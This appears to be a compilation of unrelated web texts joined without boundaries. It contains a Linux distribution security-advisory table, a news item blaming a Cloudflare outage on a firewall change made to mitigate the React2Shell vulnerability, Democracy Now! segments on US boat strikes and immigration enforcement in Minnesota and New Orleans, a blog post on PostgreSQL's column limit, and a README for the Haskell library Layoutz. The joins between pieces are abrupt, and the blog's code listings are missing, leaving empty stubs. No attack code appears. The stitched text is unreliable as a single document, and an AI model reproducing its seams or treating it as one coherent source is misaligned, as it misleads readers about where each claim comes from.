| Debian | DSA-6071-1 | stable | unbound | 2025-12-04 |
| Fedora | FEDORA-2025-fc872e9426 | F42 | CuraEngine | 2025-12-05 |
| Fedora | FEDORA-2025-19c65f1d15 | F43 | CuraEngine | 2025-12-05 |
| Fedora | FEDORA-2025-9831accfe9 | F42 | alexvsbus | 2025-12-05 |
| Fedora | FEDORA-2025-673ec8d684 | F43 | alexvsbus | 2025-12-05 |
| Fedora | FEDORA-2025-67511a59e3 | F41 | fcgi | 2025-12-05 |
| Fedora | FEDORA-2025-d7c1457e7e | F42 | fcgi | 2025-12-05 |
| Fedora | FEDORA-2025-93042e260c | F43 | fcgi | 2025-12-05 |
| Fedora | FEDORA-2025-6a43695048 | F42 | libcoap | 2025-12-05 |
| Fedora | FEDORA-2025-d408d76c4a | F43 | libcoap | 2025-12-05 |
| Fedora | FEDORA-2025-3075610004 | F41 | python-kdcproxy | 2025-12-05 |
| Fedora | FEDORA-2025-068c570cbf | F42 | python-kdcproxy | 2025-12-05 |
| Fedora | FEDORA-2025-3f9b87b0e7 | F43 | python-kdcproxy | 2025-12-05 |
| Fedora | FEDORA-2025-e72c726192 | F42 | texlive-base | 2025-12-05 |
| Fedora | FEDORA-2025-7c5b6a3bcb | F43 | texlive-base | 2025-12-05 |
| Fedora | FEDORA-2025-f0df882417 | F42 | timg | 2025-12-05 |
| Fedora | FEDORA-2025-d2b7d94014 | F43 | timg | 2025-12-05 |
| Fedora | FEDORA-2025-e72c726192 | F42 | xpdf | 2025-12-05 |
| Fedora | FEDORA-2025-7c5b6a3bcb | F43 | xpdf | 2025-12-05 |
| Mageia | MGASA-2025-0316 | 9 | digikam, darktable, libraw | 2025-12-05 |
| Mageia | MGASA-2025-0317 | 9 | gnutls | 2025-12-05 |
| Mageia | MGASA-2025-0320 | 9 | python-django | 2025-12-05 |
| Mageia | MGASA-2025-0318 | 9 | unbound | 2025-12-05 |
| Mageia | MGASA-2025-0319 | 9 | webkit2 | 2025-12-05 |
| Mageia | MGASA-2025-0321 | 9 | xkbcomp | 2025-12-05 |
| Oracle | ELSA-2025-21034 | OL10 | bind | 2025-12-05 |
| Oracle | ELSA-2025-21281 | OL10 | firefox | 2025-12-05 |
| Oracle | ELSA-2025-22417 | OL8 | gimp:2.8 | 2025-12-05 |
| Oracle | ELSA-2025-21691 | OL10 | haproxy | 2025-12-05 |
| Oracle | ELSA-2025-20994 | OL10 | ipa | 2025-12-05 |
| Oracle | ELSA-2025-21485 | OL10 | java-25-openjdk | 2025-12-05 |
| Oracle | ELSA-2025-21006 | OL10 | kea | 2025-12-05 |
| Oracle | ELSA-2025-21038 | OL10 | kea | 2025-12-05 |
| Oracle | ELSA-2025-21118 | OL10 | kernel | 2025-12-05 |
| Oracle | ELSA-2025-21463 | OL10 | kernel | 2025-12-05 |
| Oracle | ELSA-2025-21032 | OL10 | libsoup3 | 2025-12-05 |
| Oracle | ELSA-2025-21013 | OL10 | libssh | 2025-12-05 |
| Oracle | ELSA-2025-20998 | OL10 | libtiff | 2025-12-05 |
| Oracle | ELSA-2025-21248 | OL10 | openssl | 2025-12-05 |
| Oracle | ELSA-2025-20983 | OL10 | podman | 2025-12-05 |
| Oracle | ELSA-2025-21220 | OL10 | podman | 2025-12-05 |
| Oracle | ELSA-2025-21037 | OL10 | qt6-qtsvg | 2025-12-05 |
| Oracle | ELSA-2025-21002 | OL10 | squid | 2025-12-05 |
| Oracle | ELSA-2025-22660 | OL9 | systemd | 2025-12-05 |
| Oracle | ELSA-2025-21015 | OL10 | vim | 2025-12-05 |
| Oracle | ELSA-2025-21035 | OL10 | xorg-x11-server-Xwayland | 2025-12-05 |
| Slackware | SSA:2025-338-01 | httpd | 2025-12-04 | |
| Slackware | SSA:2025-338-02 | libpng | 2025-12-04 | |
| SUSE | openSUSE-SU-2025:15794-1 | TW | chromedriver | 2025-12-04 |
| SUSE | SUSE-SU-2025:4320-1 | SLE15 SLE-m5.5 oS15.5 | kernel | 2025-12-04 |
| SUSE | openSUSE-SU-2025:0461-1 | osB15 | python-mistralclient | 2025-12-04 |
| SUSE | openSUSE-SU-2025:0460-1 | osB15 | python-mistralclient | 2025-12-04 |
| Ubuntu | USN-7912-2 | 16.04 18.04 20.04 | cups | 2025-12-04 |
| Ubuntu | USN-7912-1 | 22.04 24.04 25.04 25.10 | cups | 2025-12-04 |
| Ubuntu | USN-7910-2 | 22.04 | linux-azure | 2025-12-05 |
| Ubuntu | USN-7909-4 | 22.04 | linux-gcp, linux-gke, linux-gkeop | 2025-12-05 |
| Ubuntu | USN-7906-2 | 25.10 | linux-gcp | 2025-12-05 |
| Ubuntu | USN-7889-5 | 22.04 | linux-ibm-6.8 | 2025-12-05 |
| Ubuntu | USN-7874-3 | 20.04 | linux-iot | 2025-12-04 |
| Ubuntu | USN-7913-1 | 18.04 20.04 22.04 24.04 25.04 25.10 | mame | 2025-12-04 |
Earlier today, Cloudflare experienced a widespread outage that caused websites and online platforms worldwide to go down, returning a "500 Internal Server Error" message.
In a status page update, the internet infrastructure company has now blamed the incident on an emergency patch designed to address a critical remote code execution vulnerability in React Server Components, which is now actively exploited in attacks.
"A change made to how Cloudflare's Web Application Firewall parses requests caused Cloudflare's network to be unavailable for several minutes this morning," Cloudflare said .
"This was not an attack; the change was deployed by our team to help mitigate the industry-wide vulnerability disclosed this week in React Server Components. We will share more information as we have it today."
Tracked as CVE-2025-55182 , this maximum severity security flaw (dubbed React2Shell) affects the React open-source JavaScript library for web and native user interfaces, as well as dependent React frameworks such as Next.js, React Router, Waku, @parcel/rsc, @vitejs/plugin-rsc, and RedwoodSDK.
The vulnerability was found in the React Server Components (RSC) 'Flight' protocol, and it allows unauthenticated attackers to gain remote code execution in React and Next.js applications by sending maliciously crafted HTTP requests to React Server Function endpoints.
While multiple React packages in their default configuration (i.e., react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack) are vulnerable, the flaw only affects React versions 19.0, 19.1.0, 19.1.1, and 19.2.0 released during the past year.
Although the impact is not as widespread as initially believed, security researchers with Amazon Web Services (AWS) have reported that multiple China-linked hacking groups (including Earth Lamia and Jackpot Panda) have begun exploiting the React2Shell vulnerability hours after the max-severity flaw was disclosed.
The NHS England National CSOC also said on Thursday that several functional CVE-2025-55182 proof-of-concept exploits are already available and warned that "continued successful exploitation in the wild is highly likely."
Last month, Cloudflare experienced another worldwide outage that brought down the company's Global Network for almost 6 hours, an incident described by CEO Matthew Prince as the "worst outage since 2019."
Cloudflare fixed another massive outage in June, which caused Access authentication failures and Zero Trust WARP connectivity issues across multiple regions, and also impacted Google Cloud's infrastructure.
Broken IAM isn't just an IT problem - the impact ripples across your whole business.
This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.
The U.S. military said Thursday that it blew up another boat of suspected drug smugglers, this time killing four people in the eastern Pacific. The U.S. has now killed at least 87 people in 22 strikes since September. The U.S. has not provided proof as to the vessels’ activities or the identities of those on board who were targeted, but now the family of a fisherman from Colombia has filed the first legal challenge to the military strikes. In a petition filed with the Inter-American Commission on Human Rights, the family says a strike on September 15 killed 42-year-old Alejandro Andres Carranza Medina, a fisherman from Santa Marta and father of four. His family says he was fishing for tuna and marlin off Colombia’s Caribbean coast when his boat was bombed, and was not smuggling drugs.
“Alejandro was murdered,” says international human rights attorney Dan Kovalik, who filed the legal petition on behalf of the family. “This is not how a civilized nation should act, just murdering people on the high seas without proof, without trial.”
Please check back later for full transcript.
The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
Federal authorities are carrying out intensified operations this week in Minnesota as President Donald Trump escalates his attacks on the Somali community in the state. The administration halted green card and citizenship applications from Somalis and people from 18 other countries after last week’s fatal shooting near the White House. During a recent Cabinet meeting, Trump went on a racist tirade against the Somali community, saying, “We don’t want them in our country,” and referring to Somali immigrants as “garbage.” Minnesota has the largest Somali community in the United States, and the vast majority of the estimated 80,000 residents in the state are American citizens or legal permanent residents.
“We have seen vile things that the president has said, but in these moments, we need to come together and respond,” says Jaylani Hussein, the executive director of CAIR -Minnesota. He also highlights the connections between Trump’s targeting of the community and foreign policy. “If you demonize Muslims, then you can get away with killing Muslims abroad. This has always been the case, from the Afghanistan War to the Iraq War.”
Please check back later for full transcript.
The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
A recent blog posting by Frédéric Delacourt ( Did you know? Tables in PostgreSQL are limited to 1,600 columns ) reminded me once again that in the analytics world customers sometimes ask for more than 1600 columns.
Quick recap: in OLTP , the aim is (usually) to use the 3rd normal form . In OLAP , tables are often only vaguely normalized, and wide or very wide fact tables in 2nd normal form are quite common. But are 1600 columns a bad idea? Yes. Do some applications generate such wide tables? Also yes. I’ve seen my fair share of customer requests and support tickets asking if the 1600 columns limit can be raised or even lifted.
But is that possible?
In
PostgreSQL
, a single row must fit into a single page on disk. The disk page size, by default, is
8 kB
. As
Frédéric
shows in tests in his blog posting, sometimes even a smaller number of columns does not fit into the page.
Now my analytics background is not only with
PostgreSQL
. but also with
WarehousePG
(a
Greenplum
fork) and with
Greenplum
itself. In
WarehousePG
the default page size is
32 kB
. Will this increase the number of columns? Unfortunately not:
|
|
The fork is still using the same values for
MaxTupleAttributeNumber
and
MaxHeapAttributeNumber
, limited to
1600
columns. There’s also a comment near
MaxHeapAttributeNumber
in
src/include/access/htup_details.h
:
|
|
It is possible to increase these limits, and create tables with a couple thousand columns. Theoretically, a single page fits
8136
single byte columns (like a
BOOLEAN
) in
PostgreSQL
. In
WarehousePG
this even fits
32712
single byte columns. But that is not the real limit.
The
HeapTupleHeader
has the
t_infomask2
field, which is a
uint16
(unsigned integer), defined in
access/htup_details.h
. Out of the available bits, 11 are used for the number of attributes:
|
|
And 11 bits is
2047
attributes. Any tuple can have a maximum of
2047
attributes, even with all the
1600
safeguards increased or removed. In practice, it’s
2041
attributes. When inserting/updating a table, the database will not write more than those
2041
columns, all other columns are not set. If the column definition of the higher columns is
NOT NULL
, the
INSERT
or
UPDATE
fails with a constraint violation. Otherwise the higher columns ares simply set to
NULL
.
Bottom line: while the table can have many more columns, the database can’t write anything into these additional columns. Not without fully refactoring the way tuples are created internally.
In theory it is possible to raise the
1600
columns limit to a slightly larger number. In practice it is not worth the small gain, and is pushing internal safety boundaries built into the database.
Also in practice this will have all type of mostly unintended side effects and problems. This is untested territory, all unit tests must be updated as well. Tools like
psql
have a built-in limitation as well, which also must be raised. This in turn requires always using the patched binary, it might no longer be possible to use a “standard”
psql
against this database. Other tools might have problems as well with very wide tables.
Exporting the data is possible, but the table can no longer be imported into an unpatched version of the database. This basically creates a fork of a fork, which must be maintained and updated for every new minor and major version.
tl;dr: Don’t do this.
Thanks to Robert Haas for reviewing the code assumptions about larger number of columns.
With an account on the Fediverse or Mastodon, you can respond to this post . Known replies are displayed below:
Learn how this is implemented here .
Share:
Simple, beautiful CLI output for Haskell 🪶
Build declarative and composable sections, trees, tables, dashboards, and interactive Elm-style TUI's.
Part of d4 • Also in: JavaScript , Scala
Layoutz.hs
like a header file
LayoutzApp
for Elm-style TUI's
TaskListDemo.hs
•
SimpleGame.hs
Add Layoutz on
Hackage
to your project's
.cabal
file:
build-depends: layoutz
All you need:
import Layoutz
(1/2) Static rendering - Beautiful, compositional strings:
import Layoutz
demo = layout
[ center $ row
[ withStyle StyleBold $ text "Layoutz"
, withColor ColorCyan $ underline' "ˆ" $ text "DEMO"
]
, br
, row
[ statusCard "Users" "1.2K"
, withBorder BorderDouble $ statusCard "API" "UP"
, withColor ColorRed $ withBorder BorderThick $ statusCard "CPU" "23%"
, withStyle StyleReverse $ withBorder BorderRound $ table ["Name", "Role", "Skills"]
[ ["Gegard", "Pugilist", ul ["Armenian", ul ["bad", ul["man"]]]]
, ["Eve", "QA", "Testing"]
]
]
]
putStrLn $ render demo
(2/2) Interactive apps - Build Elm-style TUI's:
import Layoutz
data Msg = Inc | Dec
counterApp :: LayoutzApp Int Msg
counterApp = LayoutzApp
{ appInit = (0, None)
, appUpdate = \msg count -> case msg of
Inc -> (count + 1, None)
Dec -> (count - 1, None)
, appSubscriptions = \_ -> onKeyPress $ \key -> case key of
CharKey '+' -> Just Inc
CharKey '-' -> Just Dec
_ -> Nothing
, appView = \count -> layout
[ section "Counter" [text $ "Count: " <> show count]
, ul ["Press '+' or '-'", "ESC to quit"]
]
}
main = runApp counterApp
printf
and
full-blown
TUI libraries - but there's a gap in-between
Element
layout
arranges elements
vertically
:
layout [elem1, elem2, elem3] -- Joins with "\n"
Call
render
on any element to get a string
The power comes from
uniform composition
- since everything has the
Element
typeclass, everything can be combined.
With
OverloadedStrings
enabled, you can use string literals directly:
layout ["Hello", "World"] -- Instead of layout [text "Hello", text "World"]
Note:
When passing to functions that take polymorphic
Element a
parameters (like
underline'
,
center'
,
pad
), use
text
explicitly:
underline' "=" $ text "Title" -- Correct
underline' "=" "Title" -- Ambiguous type error
text "Simple text"
-- Or with OverloadedStrings:
"Simple text"
Simple text
Add line breaks with
br
:
layout ["Line 1", br, "Line 2"]
Line 1
Line 2
section
section "Config" [kv [("env", "prod")]]
section' "-" "Status" [kv [("health", "ok")]]
section'' "#" "Report" 5 [kv [("items", "42")]]
=== Config ===
env: prod
--- Status ---
health: ok
##### Report #####
items: 42
layout
layout ["First", "Second", "Third"]
First
Second
Third
row
Arrange elements side-by-side horizontally:
row ["Left", "Middle", "Right"]
Left Middle Right
Multi-line elements are aligned at the top:
row
[ layout ["Left", "Column"]
, layout ["Middle", "Column"]
, layout ["Right", "Column"]
]
tightRow
Like
row
, but with no spacing between elements (useful for gradients and progress bars):
tightRow [withColor ColorRed $ text "█", withColor ColorGreen $ text "█", withColor ColorBlue $ text "█"]
███
alignLeft
,
alignRight
,
alignCenter
,
justify
Align text within a specified width:
layout
[ alignLeft 40 "Left aligned"
, alignCenter 40 "Centered"
, alignRight 40 "Right aligned"
, justify 40 "This text is justified evenly"
]
Left aligned
Centered
Right aligned
This text is justified evenly
hr
hr
hr' "~"
hr'' "-" 10
──────────────────────────────────────────────────
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
----------
vr
row [vr, vr' "║", vr'' "x" 5]
│ ║ x
│ ║ x
│ ║ x
│ ║ x
│ ║ x
│ ║
│ ║
│ ║
│ ║
│ ║
kv
kv [("name", "Alice"), ("role", "admin")]
name: Alice
role: admin
table
Tables automatically handle alignment and borders:
table ["Name", "Age", "City"]
[ ["Alice", "30", "New York"]
, ["Bob", "25", ""]
, ["Charlie", "35", "London"]
]
┌─────────┬─────┬─────────┐
│ Name │ Age │ City │
├─────────┼─────┼─────────┤
│ Alice │ 30 │ New York│
│ Bob │ 25 │ │
│ Charlie │ 35 │ London │
└─────────┴─────┴─────────┘
ul
Clean unordered lists with automatic nesting:
ul ["Feature A", "Feature B", "Feature C"]
• Feature A
• Feature B
• Feature C
Nested lists with auto-styling:
ul [ "Backend"
, ul ["API", "Database"]
, "Frontend"
, ul ["Components", ul ["Header", ul ["Footer"]]]
]
• Backend
◦ API
◦ Database
• Frontend
◦ Components
▪ Header
• Footer
ol
Numbered lists with automatic nesting:
ol ["First step", "Second step", "Third step"]
1. First step
2. Second step
3. Third step
Nested ordered lists with automatic style cycling (numbers → letters → roman numerals):
ol [ "Setup"
, ol ["Install dependencies", "Configure", ol ["Check version"]]
, "Build"
, "Deploy"
]
1. Setup
a. Install dependencies
b. Configure
i. Check version
2. Build
3. Deploy
underline
Add underlines to any element:
underline "Important Title"
underline' "=" $ text "Custom" -- Use text for custom underline char
Important Title
───────────────
Custom
══════
box
With title:
box "Summary" [kv [("total", "42")]]
┌──Summary───┐
│ total: 42 │
└────────────┘
Without title:
box "" [kv [("total", "42")]]
┌────────────┐
│ total: 42 │
└────────────┘
statusCard
statusCard "CPU" "45%"
┌───────┐
│ CPU │
│ 45% │
└───────┘
inlineBar
inlineBar "Download" 0.75
Download [███████████████─────] 75%
tree
tree "Project"
[ branch "src"
[ leaf "main.hs"
, leaf "test.hs"
]
, branch "docs"
[ leaf "README.md"
]
]
Project
├── src
│ ├── main.hs
│ └── test.hs
└── docs
└── README.md
chart
chart [("Web", 10), ("Mobile", 20), ("API", 15)]
Web │████████████████████ 10
Mobile │████████████████████████████████████████ 20
API │██████████████████████████████ 15
pad
Add uniform padding around any element:
pad 2 $ text "content"
content
spinner
Animated loading spinners for TUI apps:
spinner "Loading..." frameNum SpinnerDots
spinner "Processing" frameNum SpinnerLine
spinner "Working" frameNum SpinnerClock
spinner "Thinking" frameNum SpinnerBounce
Styles:
SpinnerDots
- Braille dot spinner: ⠋ ⠙ ⠹ ⠸ ⠼ ⠴ ⠦ ⠧ ⠇ ⠏
SpinnerLine
- Classic line spinner: | / - \
SpinnerClock
- Clock face spinner: 🕐 🕑 🕒 ...
SpinnerBounce
- Bouncing dots: ⠁ ⠂ ⠄ ⠂
Increment the frame number on each render to animate:
-- In your app state, track a frame counter
data AppState = AppState { spinnerFrame :: Int, ... }
-- In your view function
spinner "Loading" (spinnerFrame state) SpinnerDots
-- In your update function (triggered by a tick or key press)
state { spinnerFrame = spinnerFrame state + 1 }
With colors:
withColor ColorGreen $ spinner "Success!" frame SpinnerDots
withColor ColorYellow $ spinner "Warning" frame SpinnerLine
center
Smart auto-centering and manual width:
center "Auto-centered" -- Uses layout context
center' 20 "Manual width" -- Fixed width
Auto-centered
Manual width
margin
Add prefix margins to elements for compiler-style error messages:
margin "[error]"
[ text "Ooops"
, text ""
, row [ text "result :: Int = "
, underline' "^" $ text "getString"
]
, text "Expected Int, found String"
]
[error] Ooops
[error]
[error] result :: Int = getString
[error] ^^^^^^^^^
[error] Expected Int, found String
Elements like
box
,
table
, and
statusCard
support different border styles:
BorderNormal (default):
box "Title" ["content"]
┌──Title──┐
│ content │
└─────────┘
BorderDouble :
withBorder BorderDouble $ statusCard "API" "UP"
╔═══════╗
║ API ║
║ UP ║
╚═══════╝
BorderThick :
withBorder BorderThick $ table ["Name"] [["Alice"]]
┏━━━━━━━┓
┃ Name ┃
┣━━━━━━━┫
┃ Alice ┃
┗━━━━━━━┛
BorderRound :
withBorder BorderRound $ box "Info" ["content"]
╭──Info───╮
│ content │
╰─────────╯
BorderNone (invisible borders):
withBorder BorderNone $ box "Info" ["content"]
Info
content
Add ANSI colors to any element:
layout[
withColor ColorRed $ text "The quick brown fox...",
withColor ColorBrightCyan $ text "The quick brown fox...",
underlineColored "~" ColorRed $ text "The quick brown fox...",
margin "[INFO]" [withColor ColorCyan $ text "The quick brown fox..."]
]
Standard Colors:
ColorBlack
ColorRed
ColorGreen
ColorYellow
ColorBlue
ColorMagenta
ColorCyan
ColorWhite
ColorBrightBlack
ColorBrightRed
ColorBrightGreen
ColorBrightYellow
ColorBrightBlue
ColorBrightMagenta
ColorBrightCyan
ColorBrightWhite
ColorNoColor
(for conditional formatting)
Extended Colors:
ColorFull n
- 256-color palette (0-255)
ColorTrue r g b
- 24-bit RGB true color
Create beautiful gradients with extended colors:
let palette = tightRow $ map (\i -> withColor (ColorFull i) $ text "█") [16, 19..205]
redToBlue = tightRow $ map (\i -> withColor (ColorTrue i 100 (255 - i)) $ text "█") [0, 4..255]
greenFade = tightRow $ map (\i -> withColor (ColorTrue 0 (255 - i) i) $ text "█") [0, 4..255]
rainbow = tightRow $ map colorBlock [0, 4..255]
where
colorBlock i =
let r = if i < 128 then i * 2 else 255
g = if i < 128 then 255 else (255 - i) * 2
b = if i > 128 then (i - 128) * 2 else 0
in withColor (ColorTrue r g b) $ text "█"
putStrLn $ render $ layout [palette, redToBlue, greenFade, rainbow]
Add ANSI styles to any element:
layout[
withStyle StyleBold $ text "The quick brown fox...",
withColor ColorRed $ withStyle StyleBold $ text "The quick brown fox...",
withStyle StyleReverse $ withStyle StyleItalic $ text "The quick brown fox..."
]
Styles:
StyleBold
StyleDim
StyleItalic
StyleUnderline
StyleBlink
StyleReverse
StyleHidden
StyleStrikethrough
StyleNoStyle
(for conditional formatting)
Combining Styles:
Use
<>
to combine multiple styles at once:
layout[
withStyle (StyleBold <> StyleItalic <> StyleUnderline) $ text "The quick brown fox...",
withStyle (StyleBold <> StyleReverse) $ text "The quick brown fox..."
]
You can also combine colors and styles:
withColor ColorBrightYellow $ withStyle (StyleBold <> StyleItalic) $ text "The quick brown fox..."
Create your own components by implementing the
Element
typeclass
data Square = Square Int
instance Element Square where
renderElement (Square size)
| size < 2 = ""
| otherwise = intercalate "\n" (top : middle ++ [bottom])
where
w = size * 2 - 2
top = "┌" ++ replicate w '─' ++ "┐"
middle = replicate (size - 2) ("│" ++ replicate w ' ' ++ "│")
bottom = "└" ++ replicate w '─' ++ "┘"
-- Helper to avoid wrapping with L
square :: Int -> L
square n = L (Square n)
-- Use it like any other element
putStrLn $ render $ row
[ square 3
, square 5
, square 7
]
┌────┐ ┌────────┐ ┌────────────┐
│ │ │ │ │ │
└────┘ │ │ │ │
│ │ │ │
└────────┘ │ │
│ │
└────────────┘
Drop into GHCi to experiment:
cabal repl
λ> :set -XOverloadedStrings
λ> import Layoutz
λ> putStrLn $ render $ center $ box "Hello" ["World!"]
┌──Hello──┐
│ World! │
└─────────┘
λ> putStrLn $ render $ table ["A", "B"] [["1", "2"]]
┌───┬───┐
│ A │ B │
├───┼───┤
│ 1 │ 2 │
└───┴───┘
Build Elm-style terminal applications with the built-in TUI runtime.
import Layoutz
data Msg = Inc | Dec
counterApp :: LayoutzApp Int Msg
counterApp = LayoutzApp
{ appInit = (0, None)
, appUpdate = \msg count -> case msg of
Inc -> (count + 1, None)
Dec -> (count - 1, None)
, appSubscriptions = \_ -> onKeyPress $ \key -> case key of
CharKey '+' -> Just Inc
CharKey '-' -> Just Dec
_ -> Nothing
, appView = \count -> layout
[ section "Counter" [text $ "Count: " <> show count]
, ul ["Press '+' or '-'", "ESC to quit"]
]
}
main = runApp counterApp
The
runApp
function spawns three daemon threads:
appView state
to terminal (~30fps)
appSubscriptions
, calls
appUpdate
Cmd
side effects async, feeds results back
As per the above, commands run without blocking the UI.
Press ESC to exit.
LayoutzApp state msg
data LayoutzApp state msg = LayoutzApp
{ appInit :: (state, Cmd msg) -- Initial state + startup command
, appUpdate :: msg -> state -> (state, Cmd msg) -- Pure state transitions
, appSubscriptions :: state -> Sub msg -- Event sources
, appView :: state -> L -- Render to UI
}
| Subscription | Description |
|---|---|
onKeyPress (Key -> Maybe msg)
|
Keyboard input |
onTick msg
|
Periodic ticks (~100ms) for animations |
batch [sub1, sub2, ...]
|
Combine subscriptions |
| Command | Description |
|---|---|
None
|
No effect |
Cmd (IO (Maybe msg))
|
Run IO, optionally produce message |
Batch [cmd1, cmd2, ...]
|
Multiple commands |
cmd :: IO () -> Cmd msg
|
Fire and forget |
cmdMsg :: IO msg -> Cmd msg
|
IO that returns a message |
Example: Logger with file I/O
import Layoutz
data Msg = Log | Saved
data State = State { count :: Int, status :: String }
loggerApp :: LayoutzApp State Msg
loggerApp = LayoutzApp
{ appInit = (State 0 "Ready", None)
, appUpdate = \msg s -> case msg of
Log -> (s { count = count s + 1 },
cmd $ appendFile "log.txt" ("Entry " <> show (count s) <> "\n"))
Saved -> (s { status = "Saved!" }, None)
, appSubscriptions = \_ -> onKeyPress $ \key -> case key of
CharKey 'l' -> Just Log
_ -> Nothing
, appView = \s -> layout
[ section "Logger" [text $ "Entries: " <> show (count s)]
, text (status s)
, ul ["'l' to log", "ESC to quit"]
]
}
main = runApp loggerApp
CharKey Char -- 'a', '1', ' '
EnterKey, BackspaceKey, TabKey, EscapeKey, DeleteKey
ArrowUpKey, ArrowDownKey, ArrowLeftKey, ArrowRightKey
SpecialKey String -- "Ctrl+C", etc.
This is a rush transcript. Copy may not be in its final form.
AMY GOODMAN : This is Democracy Now! , democracynow.org, The War and Peace Report . I’m Amy Goodman.
We turn now to New Orleans and southeast Louisiana, where more than 250 federal immigration agents launched Operation Catahoula Crunch this week. They reportedly aim to make more than 5,000 arrests over two months.
Homeland Security Secretary Kristi Noem says the operation will target, quote, “the worst of the worst,” unquote. But local officials say they’re skeptical. City Councilmember Lesli Harris responded, quote, “There are nowhere near 5,000 violent offenders in our region. … What we’re seeing instead are mothers, teenagers, and workers being detained during routine check-ins, from their homes and places of work.” So far, agents have targeted the parking lots of home improvement stores like Home Depot and workers at construction sites.
At a New Orleans City Council hearing Thursday, about 30 protesters were removed after demanding city leaders do more to protect immigrants, calling for ICE -free zones. In a public comment session, residents went to the microphone one by one and were cut off when it was clear they wanted to talk about immigration, which was not on the formal agenda. This is Mich González of SouthEast Dignity Not Detention Coalition. After his mic was cut, he continued to try to be heard.
MICH GONZÁLEZ: We delivered a letter to City Council on November 21st. I’m part of the SouthEast Dignity Not Detention Coalition, and we requested a meeting. This should be on the agenda. It should be on the agenda.
CHAIR : Not germane.
MICH GONZÁLEZ: Public safety is at the heart —
Little kids are not going to school right now. People are not able to take their disabled parents to their medical appointments. … Please, I’m begging you.
PROTESTERS : Shame! Shame!
MICH GONZÁLEZ: And right now it’s about the safety of the people who live here. But I promise you, in just — these people are planning to stay here for two months and take as many as 5,000 of the people who live in this great city of New Orleans.
PROTESTERS : Shame! Shame!
MICH GONZÁLEZ: And they are the people who work here. They’re the people who clean dishes here. They’re the people who take care of the elderly in the nursing homes. … Please, I’m begging you.
AMY GOODMAN : For more, we’re joined by Homero López, legal director for ISLA , Immigrant Services and Legal Advocacy, based in New Orleans.
Welcome to Democracy Now! , Homero. If you can start off by talking about what exactly you understand this plan is? As they move in 250 immigration agents, they say they’re making 5,000 arrests in the next two months. What’s happening to New Orleans?
HOMERO LÓPEZ: Yes. Thank you, Amy, for having me on.
We have seen the officers come into the city and the surrounding areas, as well. And the fact that they’re looking for a specific quota, that they have a number that they’re going after, makes it clear that they’re not targeting, as they claim, the worst of the worst. Instead, they’re going to target whoever they can, and as the Supreme Court has unfortunately authorized them, they’re using racial profiling as part of that approach.
AMY GOODMAN : They’re calling it “Catahoula Crunch.” Louisiana’s state dog is the Catahoula. Explain what they’re saying here, what Kristi Noem is talking about, who the immigrants are that they’re going after.
HOMERO LÓPEZ: Yeah. They originally had called it the “Swamp Sweep,” but I guess they thought “SS” was a little bit too on the nose, so they went after “Catahoula Crunch” instead.
And what they’re saying is they’re going to target, you know, folks who have criminal backgrounds, or at least that’s the purported position from the higher-ups at least. There was a video of Bovino recently saying he’s going after immigrants. He was asked, “Who are you targeting? What are you — who are you looking for?” And he said, “This is an immigration raid.” And so, he’s — they’re focusing on immigrants across the board.
What we’ve seen has been folks at work, folks at their check-ins, people around schools, ICE officers setting up around or CBP officers setting up around the schools. And the fear that’s being — the fear that’s coming into the — being sowed in the community is really the true intent of what they’re — of their operation here.
AMY GOODMAN : Catahoula Crunch named after the Louisiana state dog. Didn’t Homeland Secretary Kristi Noem famously shoot her dog?
HOMERO LÓPEZ: That is a story that’s come out, yes.
AMY GOODMAN : Many ICE officials who now work at the national level came up through Louisiana. Is that right? Can you talk about them? And who are the hundreds of agents moved in to do these arrests?
HOMERO LÓPEZ: Yeah, Louisiana is playing a oversized role when it comes to immigration enforcement throughout the country. The former wildlife and fisheries secretary here in Louisiana is now one of the deputy — or, is the deputy director of ICE nationally. Our former area, New Orleans, ICE director, field office director, is also at headquarters. There are various deportation officers here from Louisiana who have gone to work at headquarters. And so, the approach that they used to take or that they have taken in Louisiana since 2014 to incarcerate as many people as possible, quickly warehouse and deport people from the state, is something that seems to be the structure that is being operated now from the national headquarters.
AMY GOODMAN : Louisiana, in other parts of the country, we know it particularly here when it comes to detention. You have Mahmoud Khalil, who is the Columbia student who was imprisoned in Louisiana. You have Rümeysa Öztürk, the Tufts graduate student who was imprisoned in Louisiana. Talk about the overall detention complex in Louisiana.
HOMERO LÓPEZ: Louisiana has a history, a terrible history, of being the incarceration capital of the world. And that is no different when it comes now to immigration detention. Louisiana is number two when it comes to the second — the state with the second-largest detained immigrant population in the country, next to Texas. However, we’re not a border state. We also don’t have a large immigrant population by numbers. Instead, what Louisiana does is it receives a lot of people who are detained around the country.
And so, the additional aspect of what happens in Louisiana is that we have these very rural, isolated detention centers in central Louisiana, central and northern Louisiana, which are very far away from major metropolitan or from major population centers, which means what you end up with is people removed from their legal and support systems. So, when you had someone like Mahmoud Khalil being moved down here from New York, what you had was removing him from his social network, from people who could assist him, from being able to provide him with assistance. Same thing with Rümeysa Öztürk. And these were highly publicized cases, places where folks had large support networks. And so, when we deal with folks who don’t have those support networks, who don’t have that publicity, who don’t have that kind of support, and you have them in such a remote, isolated area, what you end up is basically warehousing folks without giving them an opportunity to fight their case and be able to present a viable case through actual due process.
AMY GOODMAN : You can’t help but notice that New Orleans is a blue city in a red state, Louisiana. Louisiana has the most detention beds outside of Texas. Can you talk about the consent decree that was overturned last month, Homero?
HOMERO LÓPEZ: The consent decree was overturned last month by the Justice Department, and they wanted to get rid of it. It had been in place for over a decade here in Louisiana, that did not — or, here in New Orleans, that had not allowed the local sheriff’s office to cooperate with ICE .
Now the new sheriff, we don’t know exactly what she’s going to do, but what it does is it removes this tool that existed, which was originally implemented because of previous abuses, that had been determined by a federal court, that New Orleans police, New Orleans Sheriff’s Office should not be cooperating, and had ordered the sheriff’s office not to cooperate. Without that consent decree in place, it’s now up to the sheriff. And so, there is a movement on the ground from advocacy groups and from other organizers to push the sheriff to continue to have that kind of policy, but we’ll see what comes from that.
